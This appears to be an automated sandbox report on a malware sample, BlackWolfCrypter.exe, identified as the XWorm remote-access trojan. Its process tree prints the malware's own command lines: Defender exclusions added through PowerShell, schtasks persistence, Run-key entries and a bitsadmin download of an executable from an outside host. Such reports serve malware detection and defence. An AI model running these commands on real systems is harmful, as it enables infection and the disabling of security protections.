Analysis
-
max time kernel
124s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
11-08-2024 17:55
Static task
static1
Behavioral task
behavioral1
Sample
BlackWolfCrypter.exe
Resource
win7-20240704-en
General
-
Target
BlackWolfCrypter.exe
-
Size
1.5MB
-
MD5
083482a04d9274163675e4f9c4f00f89
-
SHA1
7e0f2f644b41524fbc3b186e3ccd8a8ad5da2fc9
-
SHA256
46cc6ea931ef4279fb353b0c2f09c1c12022c18a6a1c9b2b74814412798c9f99
-
SHA512
187ef022266a2764edbbc68efc7143bf2a2e00203bdabf88393a967e55061edef3dcde39ea5c5509a2573f61bad34295336f708f8e464a6c0d9d26026aaf2ca8
-
SSDEEP
49152:QqcprvhYrYjxufFPvPRbRhq2sVC+IblsyK:QnhbV8P9rHsVC+8ls
Malware Config
Extracted
xworm
5.0
EEarXqazEvX73BCq
-
Install_directory
%AppData%
-
install_file
Chrome Update.exe
-
pastebin_url
https://pastebin.com/raw/RPPi3ByL
Signatures
-
Detect Xworm Payload 9 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\Chrome Update.exe family_xworm behavioral1/memory/2828-20-0x0000000000AE0000-0x0000000000B08000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\OneDrive.exe family_xworm behavioral1/memory/2076-14-0x0000000000EA0000-0x0000000000ECC000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\msedge.exe family_xworm behavioral1/memory/2776-23-0x0000000000DC0000-0x0000000000DEE000-memory.dmp family_xworm behavioral1/memory/1028-2241-0x0000000000250000-0x000000000027E000-memory.dmp family_xworm behavioral1/memory/2388-2243-0x00000000012B0000-0x00000000012D8000-memory.dmp family_xworm behavioral1/memory/3428-2246-0x00000000003F0000-0x000000000041E000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1664 powershell.exe 2032 powershell.exe 904 powershell.exe 1596 powershell.exe 2676 powershell.exe 2908 powershell.exe 2500 powershell.exe 2128 powershell.exe 2100 powershell.exe 1920 powershell.exe 2876 powershell.exe 2860 powershell.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Downloads MZ/PE file
-
Drops startup file 8 IoCs
Processes:
Payload.exeChrome Update.exeOneDrive.exemsedge.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.exe Payload.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk Chrome Update.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Update.lnk Chrome Update.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk OneDrive.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk OneDrive.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payload.exe Payload.exe -
Executes dropped EXE 10 IoCs
Processes:
Chrome Update.exemsedge.exeOneDrive.exeCodeluxCrypterV3 - Cracked.exePayload.exeCodeluxCrypterV3 - Cracked by Meth.exeOneDrive.exemsedge.exeOneDrive.exemsedge.exepid process 2076 Chrome Update.exe 2776 msedge.exe 2828 OneDrive.exe 1960 CodeluxCrypterV3 - Cracked.exe 2344 Payload.exe 2516 CodeluxCrypterV3 - Cracked by Meth.exe 2388 OneDrive.exe 1028 msedge.exe 3440 OneDrive.exe 3428 msedge.exe -
Loads dropped DLL 13 IoCs
Processes:
CodeluxCrypterV3 - Cracked.exerun.exepid process 1960 CodeluxCrypterV3 - Cracked.exe 1960 CodeluxCrypterV3 - Cracked.exe 1960 CodeluxCrypterV3 - Cracked.exe 1960 CodeluxCrypterV3 - Cracked.exe 1960 CodeluxCrypterV3 - Cracked.exe 1960 CodeluxCrypterV3 - Cracked.exe 2240 run.exe 2240 run.exe 2240 run.exe 2240 run.exe 2240 run.exe 2240 run.exe 2240 run.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Chrome Update.exeOneDrive.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome Update.exe" Chrome Update.exe Set value (str) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\OneDrive.exe" OneDrive.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
CodeluxCrypterV3 - Cracked.exebitsadmin.exemshta.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CodeluxCrypterV3 - Cracked.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 2236 schtasks.exe 2352 schtasks.exe 2020 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Payload.exepid process 2344 Payload.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
CodeluxCrypterV3 - Cracked by Meth.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeChrome Update.exemsedge.exeOneDrive.exepid process 2516 CodeluxCrypterV3 - Cracked by Meth.exe 2908 powershell.exe 2876 powershell.exe 2860 powershell.exe 2500 powershell.exe 1664 powershell.exe 2128 powershell.exe 2032 powershell.exe 1920 powershell.exe 2100 powershell.exe 904 powershell.exe 1596 powershell.exe 2676 powershell.exe 2076 Chrome Update.exe 2776 msedge.exe 2828 OneDrive.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
OneDrive.exeChrome Update.exemsedge.exeCodeluxCrypterV3 - Cracked by Meth.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exeOneDrive.exeOneDrive.exemsedge.exedescription pid process Token: SeDebugPrivilege 2828 OneDrive.exe Token: SeDebugPrivilege 2076 Chrome Update.exe Token: SeDebugPrivilege 2776 msedge.exe Token: SeDebugPrivilege 2516 CodeluxCrypterV3 - Cracked by Meth.exe Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 2500 powershell.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 1920 powershell.exe Token: SeDebugPrivilege 2100 powershell.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 2076 Chrome Update.exe Token: SeDebugPrivilege 2776 msedge.exe Token: SeDebugPrivilege 2828 OneDrive.exe Token: SeDebugPrivilege 1028 msedge.exe Token: SeDebugPrivilege 2388 OneDrive.exe Token: SeDebugPrivilege 3440 OneDrive.exe Token: SeDebugPrivilege 3428 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
Chrome Update.exemsedge.exeOneDrive.exepid process 2076 Chrome Update.exe 2776 msedge.exe 2828 OneDrive.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
BlackWolfCrypter.exemshta.exeCodeluxCrypterV3 - Cracked.exemsedge.exeOneDrive.exeChrome Update.exedescription pid process target process PID 2152 wrote to memory of 2076 2152 BlackWolfCrypter.exe Chrome Update.exe PID 2152 wrote to memory of 2076 2152 BlackWolfCrypter.exe Chrome Update.exe PID 2152 wrote to memory of 2076 2152 BlackWolfCrypter.exe Chrome Update.exe PID 2152 wrote to memory of 2776 2152 BlackWolfCrypter.exe msedge.exe PID 2152 wrote to memory of 2776 2152 BlackWolfCrypter.exe msedge.exe PID 2152 wrote to memory of 2776 2152 BlackWolfCrypter.exe msedge.exe PID 2152 wrote to memory of 2828 2152 BlackWolfCrypter.exe OneDrive.exe PID 2152 wrote to memory of 2828 2152 BlackWolfCrypter.exe OneDrive.exe PID 2152 wrote to memory of 2828 2152 BlackWolfCrypter.exe OneDrive.exe PID 2152 wrote to memory of 2088 2152 BlackWolfCrypter.exe mshta.exe PID 2152 wrote to memory of 2088 2152 BlackWolfCrypter.exe mshta.exe PID 2152 wrote to memory of 2088 2152 BlackWolfCrypter.exe mshta.exe PID 2152 wrote to memory of 2088 2152 BlackWolfCrypter.exe mshta.exe PID 2152 wrote to memory of 1960 2152 BlackWolfCrypter.exe CodeluxCrypterV3 - Cracked.exe PID 2152 wrote to memory of 1960 2152 BlackWolfCrypter.exe CodeluxCrypterV3 - Cracked.exe PID 2152 wrote to memory of 1960 2152 BlackWolfCrypter.exe CodeluxCrypterV3 - Cracked.exe PID 2152 wrote to memory of 1960 2152 BlackWolfCrypter.exe CodeluxCrypterV3 - Cracked.exe PID 2152 wrote to memory of 1960 2152 BlackWolfCrypter.exe CodeluxCrypterV3 - Cracked.exe PID 2152 wrote to memory of 1960 2152 BlackWolfCrypter.exe CodeluxCrypterV3 - Cracked.exe PID 2152 wrote to memory of 1960 2152 BlackWolfCrypter.exe CodeluxCrypterV3 - Cracked.exe PID 2088 wrote to memory of 3040 2088 mshta.exe bitsadmin.exe PID 2088 wrote to memory of 3040 2088 mshta.exe bitsadmin.exe PID 2088 wrote to memory of 3040 2088 mshta.exe bitsadmin.exe PID 2088 wrote to memory of 3040 2088 mshta.exe bitsadmin.exe PID 1960 wrote to memory of 2344 1960 CodeluxCrypterV3 - Cracked.exe Payload.exe PID 1960 wrote to memory of 2344 1960 CodeluxCrypterV3 - Cracked.exe Payload.exe PID 1960 wrote to memory of 2344 1960 CodeluxCrypterV3 - Cracked.exe Payload.exe PID 1960 wrote to memory of 2344 1960 CodeluxCrypterV3 - Cracked.exe Payload.exe PID 1960 wrote to memory of 2516 1960 CodeluxCrypterV3 - Cracked.exe CodeluxCrypterV3 - Cracked by Meth.exe PID 1960 wrote to memory of 2516 1960 CodeluxCrypterV3 - Cracked.exe CodeluxCrypterV3 - Cracked by Meth.exe PID 1960 wrote to memory of 2516 1960 CodeluxCrypterV3 - Cracked.exe CodeluxCrypterV3 - Cracked by Meth.exe PID 1960 wrote to memory of 2516 1960 CodeluxCrypterV3 - Cracked.exe CodeluxCrypterV3 - Cracked by Meth.exe PID 2776 wrote to memory of 2860 2776 msedge.exe powershell.exe PID 2776 wrote to memory of 2860 2776 msedge.exe powershell.exe PID 2776 wrote to memory of 2860 2776 msedge.exe powershell.exe PID 2828 wrote to memory of 2876 2828 OneDrive.exe powershell.exe PID 2828 wrote to memory of 2876 2828 OneDrive.exe powershell.exe PID 2828 wrote to memory of 2876 2828 OneDrive.exe powershell.exe PID 2076 wrote to memory of 2908 2076 Chrome Update.exe powershell.exe PID 2076 wrote to memory of 2908 2076 Chrome Update.exe powershell.exe PID 2076 wrote to memory of 2908 2076 Chrome Update.exe powershell.exe PID 2776 wrote to memory of 2128 2776 msedge.exe powershell.exe PID 2776 wrote to memory of 2128 2776 msedge.exe powershell.exe PID 2776 wrote to memory of 2128 2776 msedge.exe powershell.exe PID 2828 wrote to memory of 1664 2828 OneDrive.exe powershell.exe PID 2828 wrote to memory of 1664 2828 OneDrive.exe powershell.exe PID 2828 wrote to memory of 1664 2828 OneDrive.exe powershell.exe PID 2076 wrote to memory of 2500 2076 Chrome Update.exe powershell.exe PID 2076 wrote to memory of 2500 2076 Chrome Update.exe powershell.exe PID 2076 wrote to memory of 2500 2076 Chrome Update.exe powershell.exe PID 2828 wrote to memory of 2032 2828 OneDrive.exe powershell.exe PID 2828 wrote to memory of 2032 2828 OneDrive.exe powershell.exe PID 2828 wrote to memory of 2032 2828 OneDrive.exe powershell.exe PID 2776 wrote to memory of 2100 2776 msedge.exe powershell.exe PID 2776 wrote to memory of 2100 2776 msedge.exe powershell.exe PID 2776 wrote to memory of 2100 2776 msedge.exe powershell.exe PID 2076 wrote to memory of 1920 2076 Chrome Update.exe powershell.exe PID 2076 wrote to memory of 1920 2076 Chrome Update.exe powershell.exe PID 2076 wrote to memory of 1920 2076 Chrome Update.exe powershell.exe PID 2828 wrote to memory of 904 2828 OneDrive.exe powershell.exe PID 2828 wrote to memory of 904 2828 OneDrive.exe powershell.exe PID 2828 wrote to memory of 904 2828 OneDrive.exe powershell.exe PID 2076 wrote to memory of 1596 2076 Chrome Update.exe powershell.exe PID 2076 wrote to memory of 1596 2076 Chrome Update.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\BlackWolfCrypter.exe"C:\Users\Admin\AppData\Local\Temp\BlackWolfCrypter.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\AppData\Roaming\Chrome Update.exe"C:\Users\Admin\AppData\Roaming\Chrome Update.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2236 -
C:\Users\Admin\AppData\Roaming\msedge.exe"C:\Users\Admin\AppData\Roaming\msedge.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2020 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:904 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2352 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/uNoP8413-run.exe C:\Users\Admin\AppData\Local\Temp\run.exe3⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:3040 -
C:\Users\Admin\AppData\Local\Temp\run.exe"C:\Users\Admin\AppData\Local\Temp\run.exe"3⤵PID:1088
-
C:\Users\Admin\AppData\Local\Temp\run.exe"C:\Users\Admin\AppData\Local\Temp\run.exe"4⤵
- Loads dropped DLL
PID:2240 -
C:\Users\Admin\AppData\Roaming\CodeluxCrypterV3 - Cracked.exe"C:\Users\Admin\AppData\Roaming\CodeluxCrypterV3 - Cracked.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\Payload.exe"C:\Users\Admin\AppData\Local\Temp\Payload.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
PID:2344 -
C:\Users\Admin\AppData\Local\Temp\CodeluxCrypterV3 - Cracked by Meth.exe"C:\Users\Admin\AppData\Local\Temp\CodeluxCrypterV3 - Cracked by Meth.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
C:\Windows\system32\taskeng.exetaskeng.exe {E9FA8600-AE0B-4EEE-8F42-AAE3E92AFB45} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]1⤵PID:1956
-
C:\Users\Admin\AppData\Local\msedge.exeC:\Users\Admin\AppData\Local\msedge.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\ProgramData\OneDrive.exeC:\ProgramData\OneDrive.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2388 -
C:\Users\Admin\AppData\Local\msedge.exeC:\Users\Admin\AppData\Local\msedge.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3428 -
C:\ProgramData\OneDrive.exeC:\ProgramData\OneDrive.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3440
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.6MB
MD5d521654d889666a0bc753320f071ef60
SHA15fd9b90c5d0527e53c199f94bad540c1e0985db6
SHA25621700f0bad5769a1b61ea408dc0a140ffd0a356a774c6eb0cc70e574b929d2e2
SHA5127a726835423a36de80fb29ef65dfe7150bd1567cac6f3569e24d9fe091496c807556d0150456429a3d1a6fd2ed0b8ae3128ea3b8674c97f42ce7c897719d2cd3
-
Filesize
992KB
MD50e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA14189f4459c54e69c6d3155a82524bda7549a75a6
SHA2568a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd
-
Filesize
152KB
MD516cdd301591c6af35a03cd18caee2e59
SHA192c6575b57eac309c8664d4ac76d87f2906e8ef3
SHA25611d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8
SHA512a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476
-
Filesize
985KB
MD56e82b06539a033a023b13ac9b465802d
SHA1edcbdf77edf0b41ce2544849ad951e32cae1c1c4
SHA25670a8fa19d2adc8854ca7755976dabe7e72ab8170d550a11bc833c1cbcc7e4b79
SHA512b7da4310e8ff632d1f6f59e803dda076f547ee2e80bc94cf0cef16e2fa8b341fb04d863e7188d8ff84a352eef6d62c0d8a25d1865f21698e205dd532522233d6
-
Filesize
841B
MD53e0498940faf1d7727ddb5598e610437
SHA12b5a6e911201b3e6311e9359f3a956f314657a4c
SHA256b2ab4ece660aaa2423e5168eaeecc7046186dbe106f4956268bc663ab8af4af7
SHA5122f07d0c1774eb6b3d90f7449a1088ea4919e56e0c59973b74201fecbcb0798964716b6a26c0e70c220d5b9e378e36a1965caeeb3164b75706f46fd836f20e182
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD573e11eaf4c5420eabfc7a2f84266afc2
SHA11468f6788b8fcb1d5121dff860eb3b54b479929e
SHA2564db56403891bd17c0a39fae0fdb1f47fc529d20142c7556611e7f469d060d100
SHA512d4c20c591130e8afe86a09892639087a5d8c37ba460afe292f1bf9c98c805da259302d96a3a79ae4aafb52b69a6f34652bc0b6a3d04280057ff455a7a85180c2
-
Filesize
140KB
MD5a1cd6f4a3a37ed83515aa4752f98eb1d
SHA17f787c8d72787d8d130b4788b006b799167d1802
SHA2565cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65
SHA5129489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355
-
Filesize
166KB
MD5aee20d80f94ae0885bb2cabadb78efc9
SHA11e82eba032fcb0b89e1fdf937a79133a5057d0a1
SHA256498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d
SHA5123a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
1.3MB
MD55f32ab42ed301cf0fa77ed3999049a57
SHA190d9b31816b8b417cc1528a524fb9733aa1b635e
SHA25679266ee85cfe4488e0b53d1e010dc5f7eeb9399ec0d5ca75444479f719b2e1c4
SHA512c0010e474436c4e563061b6d92907f25f87b2d2bb65e56319ab503bbb72263b074702de507267337ac67110544a177cf23fc3162de9fc75722aaa64382f3cb43
-
Filesize
18KB
MD5dc897e1de1632f623e141144ed28818b
SHA10de55ed8036dc589163853c5ea786cd9cad21395
SHA25676329204fdb33b9e8c080f9c05ef8b41c345bdcaf21d7c1687eab6fd8e815b4c
SHA512acfcbbc538b99b8fa957cbafe9ebaadbb9f5886cfcc95ae4556fed9e103be8008ce17c58855c664bedfe82984bbe4f39078d1f2879f86dee60220a12747f870e
-
Filesize
21KB
MD51c58526d681efe507deb8f1935c75487
SHA10e6d328faf3563f2aae029bc5f2272fb7a742672
SHA256ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2
SHA5128edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1
-
Filesize
18KB
MD5bfffa7117fd9b1622c66d949bac3f1d7
SHA1402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2
SHA2561ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
SHA512b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f
-
Filesize
21KB
MD5724223109e49cb01d61d63a8be926b8f
SHA1072a4d01e01dbbab7281d9bd3add76f9a3c8b23b
SHA2564e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210
SHA51219b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c
-
Filesize
21KB
MD5517eb9e2cb671ae49f99173d7f7ce43f
SHA14ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab
SHA25657cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54
SHA512492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be
-
Filesize
21KB
MD5d12403ee11359259ba2b0706e5e5111c
